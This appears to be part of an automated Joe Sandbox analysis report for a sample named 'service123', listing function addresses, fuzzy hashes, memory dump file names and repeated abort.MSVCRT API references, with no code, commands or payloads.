Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd6ada17347b90619d30baaaaf88ca1e4c4b93e975d9bf58c6032303d4385b40
Instruction ID: f7d59c7abc7f0c322e9aacf0f52906f7a947bb6091f0a60e813b6ccfeedb961d
Opcode Fuzzy Hash: fd6ada17347b90619d30baaaaf88ca1e4c4b93e975d9bf58c6032303d4385b40
Instruction Fuzzy Hash: 5C1106B2905245CFD300EF29C945706BBF1AB9A318F59C59CD80C8B795E37BC40A8F92

Function 6C28C040 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0e1f72f4ea6c99a866345e9dd5961d11ce8caa9f33767be019fc7a3984a8494
Instruction ID: acc935c0f0a645ab1386015815be22fdc27027808c84c7ddf9119430a5582f40
Opcode Fuzzy Hash: c0e1f72f4ea6c99a866345e9dd5961d11ce8caa9f33767be019fc7a3984a8494
Instruction Fuzzy Hash: EE018032A09148CF8700EE7DC98085AB7F5BB4B218F44CA6DED4C83745E736D4088F66

Function 6C2B84A0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b50c6d6569601c781377ae638d5d56c005e4189da5e674035919016569e33e1
Instruction ID: abd4c7a2bca919132b6bf66d2afed59f3e4039c4f21517823a2d4b0aa8994c33
Opcode Fuzzy Hash: 0b50c6d6569601c781377ae638d5d56c005e4189da5e674035919016569e33e1
Instruction Fuzzy Hash: DE012C71A08291CFC311EF39858156BBBF46B9B208F45D95AE88CC7315E236C455CB66

Function 6C23D504 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38065637cddd05bc63f8f55e83b5f6858d4a716cd9787bd456eb58d9b090392b
Instruction ID: 9b5427eb0718aafb9b7fe2c9d6f59eb674065dd31152a2c48809368bde24b48c
Opcode Fuzzy Hash: 38065637cddd05bc63f8f55e83b5f6858d4a716cd9787bd456eb58d9b090392b
Instruction Fuzzy Hash: CC014CB1A052199BDB049F69C48076AFBE4EF85248F50956DEC48CB701D335D846CBA1

Function 6C2E4360 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 337485f9f1de052174ecfa87277ab077e23f6edb558054549e1794e6ca1278a6
Instruction ID: 1b669dba4aaf050bcef48852073cb627cfe6d5b9aefa57d8b5b3419f4e5fedfe
Opcode Fuzzy Hash: 337485f9f1de052174ecfa87277ab077e23f6edb558054549e1794e6ca1278a6
Instruction Fuzzy Hash: 61F01D36A08189DF8710FE7D854196AB7F4A74F218FC89D58EC08D3B05E639D4148A67

Function 6C26A1E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5f1d6e3cec6e32501f843cea4a1b74d04176b8bfa069c4695aed97b6158ef1b
Instruction ID: 0521cbcec8a29a95796fe2cae9073a55c77e3513431022eaedd7aa643118de5a
Opcode Fuzzy Hash: a5f1d6e3cec6e32501f843cea4a1b74d04176b8bfa069c4695aed97b6158ef1b
Instruction Fuzzy Hash: 10D01271E04044DF8B00EE29C641856B7F0AB46204F54D984D80C57605D337D4068B55

Function 6C23D974 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99528a8814be3e8ec686a86f925677d1370c2879c6c577cffe59eab6e90d6a45
Instruction ID: efda1228488cfbb98d2fd78c7c70ada72f2dad65b3a68679b6d32e134ae2acfc
Opcode Fuzzy Hash: 99528a8814be3e8ec686a86f925677d1370c2879c6c577cffe59eab6e90d6a45
Instruction Fuzzy Hash: 6BC012B1904218CBCF00EF34C0C0078F7F1AF46248F526858C484E7700E771C845C785

Function 6C23D674 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d714ddeb1d54d60c99730855744db3a24bee261a28e7de1cd23f2af7a586b1f
Instruction ID: 8d7404c7468419712ca516891bc2888a916306093b02547ba6e9b5c93acd2961
Opcode Fuzzy Hash: 8d714ddeb1d54d60c99730855744db3a24bee261a28e7de1cd23f2af7a586b1f
Instruction Fuzzy Hash: 12C012B19042188BCF40EF34C0C0078F7F1AB46248F526858C494E7700E730D846CB45

Function 6C23D7F4 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6687b09114d2675d96a31c0c6d2971c8d0cefab2a3ab88b4dde04cb7df0e6767
Instruction ID: 9322f627835337720adaf60203bc1f5ee3353a4f16bc7c494ab4bfc82086b5f4
Opcode Fuzzy Hash: 6687b09114d2675d96a31c0c6d2971c8d0cefab2a3ab88b4dde04cb7df0e6767
Instruction Fuzzy Hash: D3C012B1C042188BCF00EF38C0C0578F7F0AB46244F522858C884E7700E730D846C745

Function 6C22B1D0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction ID: 94aa1ab7650ce1374d176183821c31ddec0bff35eb5231b3a90c9812feb809a4
Opcode Fuzzy Hash: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction Fuzzy Hash: E3C012B0C053848AC200BF38810A229BAB07B52208F8928ACD88023311E735C01C865B

Function 6C2128FA Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

abort.MSVCRT ref: 6C2E6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Strings

L:/l, xrefs: 6C212929

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID: L:/l
API String ID: 4206212132-1194510146
Opcode ID: e91ea1f083cae3123ad68b3f2e96b96555a1b3dcbe85373e6d06ff3d7b65eafe
Instruction ID: 90af2f184ff283cf00d5773e244a578def863418009382cdeac2575564f38f63
Opcode Fuzzy Hash: e91ea1f083cae3123ad68b3f2e96b96555a1b3dcbe85373e6d06ff3d7b65eafe
Instruction Fuzzy Hash: 88119572646209CBE708FF18D496F55B7B0FB25309F119A44DA94D7A15D738E818CB90

Function 6C212A2F Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C2E6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Strings

V:/l, xrefs: 6C212A5E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID: V:/l
API String ID: 4206212132-1835157601
Opcode ID: 7707105bb1dc39cb1e1a9fc43f55e0cfb675f1243fb54fc1f2be6ad64dd8c3a7
Instruction ID: 1a14d8be091c429464f8eac46f8affc5fe3484912a94a0a86f5a19b2d950d5c9
Opcode Fuzzy Hash: 7707105bb1dc39cb1e1a9fc43f55e0cfb675f1243fb54fc1f2be6ad64dd8c3a7
Instruction Fuzzy Hash: 4411E5B2606209CBE308FF18D496F55B7B0FB21309F019A48DA84D7A15D738E818CF90

Function 6C2129B1 Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C2E6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Strings

`:/l, xrefs: 6C2129E0

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID: `:/l
API String ID: 4206212132-3658110205
Opcode ID: 7211d06f2b98afee14af2999e11d45db4a5c02d29410bbd157e2f911f972361e
Instruction ID: 6a89de84ab352c65db148745b75ff8f2d0fd9c8c495b6a0589b4ed134715b037
Opcode Fuzzy Hash: 7211d06f2b98afee14af2999e11d45db4a5c02d29410bbd157e2f911f972361e
Instruction Fuzzy Hash: 8EF067B154520ACBD704EF18D0E9BAAB7B1FF12308F11AA48C914ABB16D734E428CF80

Function 6C21BAD0 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Strings

@, xrefs: 6C21BAB1

Memory Dump Source

